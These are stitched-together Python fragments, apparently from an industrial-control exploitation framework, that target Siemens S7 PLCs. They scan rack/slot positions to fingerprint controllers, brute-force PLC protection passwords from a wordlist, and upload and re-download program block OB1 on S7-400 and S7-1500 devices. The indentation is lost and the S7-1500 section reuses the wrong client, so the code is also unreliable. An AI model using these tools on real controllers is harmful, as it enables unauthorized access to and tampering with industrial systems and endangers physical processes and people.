def get_target_info(self, host, port):
for rack_num in range(self.min_rack, self.max_rack + 1):
for slot_num in range(self.min_slot, self.max_slot + 1):
print_status("Tring to scan %s with Rack%s/Slot%s" %
(host, rack_num, slot_num))
order_code = ''
firmware_version = ''
module_type_name = ''
module_name = ''
serial_number = ''
ip_address = host
try:
target = S7Client(name='S7Scanner',
ip=host,
port=port,
rack=rack_num,
slot=slot_num)
target.connect()
order_code, firmware_version, module_type_name, \
as_name, module_name, serial_number = target.get_target_info()
ip_address = host
if order_code != '':
self.result.append([
order_code, module_type_name, firmware_version,
module_name, serial_number,
str(rack_num) + '/' + str(slot_num), ip_address
])
except Exception as err:
print_error(err)
return False
def target_function(self, running, data):
module_verbosity = boolify(self.verbose)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
s7_client = S7Client(name="Siemens PLC",
ip=self.target,
rack=self.rack,
slot=self.slot)
s7_client.connect()
if not module_verbosity:
s7_client.logger.setLevel(50)
while running.is_set():
try:
string = data.next().strip()
if len(string) > 8:
continue
s7_client.check_privilege()
if s7_client.protect_level == 1:
print_error("Target didn't set password.")
return
s7_client.auth(string)
if s7_client.authorized:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Valid password string found - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error(
"Target: {}:{} {}: Invalid community string - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
from icssploit.clients.s7_client import S7Client
if __name__ == '__main__':
target = S7Client(name="s7Test", ip="192.168.218.101", rack=0, slot=3)
target.connect()
target.check_privilege()
print(target.get_target_info())
import os
import sys
sys.path.append('./scripts/isf')
from icssploit.clients.s7_client import S7Client
ip_400 = os.environ["s7_400"]
target = S7Client(name="S7-400", ip=ip_400, rack=0, slot=3)
try:
print('\033[46;1mS7-400 PLC - ' + ip_400 + ':\033[0m')
target.connect()
data = target.upload_block_from_target(block_type='OB', block_num=1)
print('\033[36;1m' + data + '\033[0m')
target.download_block_to_target(data)
except:
print('\033[41;1mSomething went wrong while connecting to ' + ip_400 +
'\033[0m')
ip_1500 = os.environ["s7_1500"]
target2 = S7Client(name="S7-1500", ip=ip_1500, rack=0, slot=3)
try:
print('\033[46;1mS7-1500 PLC - ' + ip_1500 + ':\033[0m')
target2.connect()
data = target.upload_block_from_target(block_type='OB', block_num=1)
print('\033[36;1m' + data + '\033[0m')
target.download_block_to_target(data)
except:
print('\033[41;1mSomething went wrong while connecting to ' + ip_1500 +
'\033[0m')